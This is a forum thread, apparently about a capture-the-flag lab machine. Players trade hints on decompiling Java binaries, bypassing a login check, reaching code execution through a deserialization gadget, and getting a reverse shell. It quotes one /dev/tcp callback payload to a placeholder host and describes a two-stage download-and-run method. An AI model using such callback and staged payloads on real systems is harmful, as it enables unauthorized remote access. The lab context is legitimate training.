I also used recaf
Can i PM someone for the root part ?
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
Type your comment> @tel0s said:
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
Type your comment> @0x41 said:
Type your comment> @tel0s said:
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.
Type your comment> @tel0s said:
Type your comment> @0x41 said:
Type your comment> @tel0s said:
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.
no redirecions, one argument only. i recommend doing it in two stages
Type your comment> @0x41 said:
Type your comment> @tel0s said:
Type your comment> @0x41 said:
Type your comment> @tel0s said:
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.
no redirecions, one argument only. i recommend doing it in two stages
I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then execute it for second, but I cant find a second stage that works. perl etc.
Type your comment> @tel0s said:
Type your comment> @0x41 said:
Type your comment> @tel0s said:
Type your comment> @0x41 said:
Type your comment> @tel0s said:
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.
no redirecions, one argument only. i recommend doing it in two stages
I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then execute it for second, but I cant find a second stage that works. perl etc.
if you have only one argument you can pass, how can you put it in /tmp? 
don’t worry about where you put it, just download it and try running it from that directory
Type your comment> @0x41 said:
Type your comment> @tel0s said:
Type your comment> @0x41 said:
Type your comment> @tel0s said:
Type your comment> @0x41 said:
Type your comment> @tel0s said:
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.
no redirecions, one argument only. i recommend doing it in two stages
I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then execute it for second, but I cant find a second stage that works. perl etc.
if you have only one argument you can pass, how can you put it in /tmp?
don’t worry about where you put it, just download it and try running it from that directory
You can definitely have more than one argument - I’ve just got user. problem is redirection chars etc.
Type your comment> @ue4dai said:
Type your comment> @CyberGeek01 said:
(Quote)
jd-gui seems to work fine.
I really thank you for this suggestion. It work very well
Type your comment> @CyberGeek01 said:
Type your comment> @ue4dai said:
Type your comment> @CyberGeek01 said:
(Quote)
jd-gui seems to work fine.I really thank you for this suggestion. It work very well
Sure thing! Happy to pass the hint along.
Can somebody pm for the admin trick ? I have a very specific question. I do not know why this technique does not working. 
For gaining user level reverse shell was there much editing of source code to allow the exploitation of the OWASP method? I am struggling to get a callback and am worried I botched the code.
Same happening to me. Have tried sending many payload variations from a common tool but have not gotten anything back. Wondering if I need to go deeper and create my own custom one that can be properly cast.
Type your comment> @Iris said:
For gaining user level reverse shell was there much editing of source code to allow the exploitation of the OWASP method? I am struggling to get a callback and am worried I botched the code.
Hello! There are need to write a custom Shell? Idk but at the moment I am stuk with the debugging and fixing of fy-ct.jr
Can you give me a suggestion? thanks!
Hi, i’m struggling with the initial foothold. I’m using recaf but not really seeing where should I work. Could anyone give me a nudge?
Eager to discuss the user payload with someone. Can’t figure out why I get nothing back.
Edit: always (usually?) update your tools. Now onto root.
Never mind, i got it
is there need to get source code of server? i decompiled client and only look at it.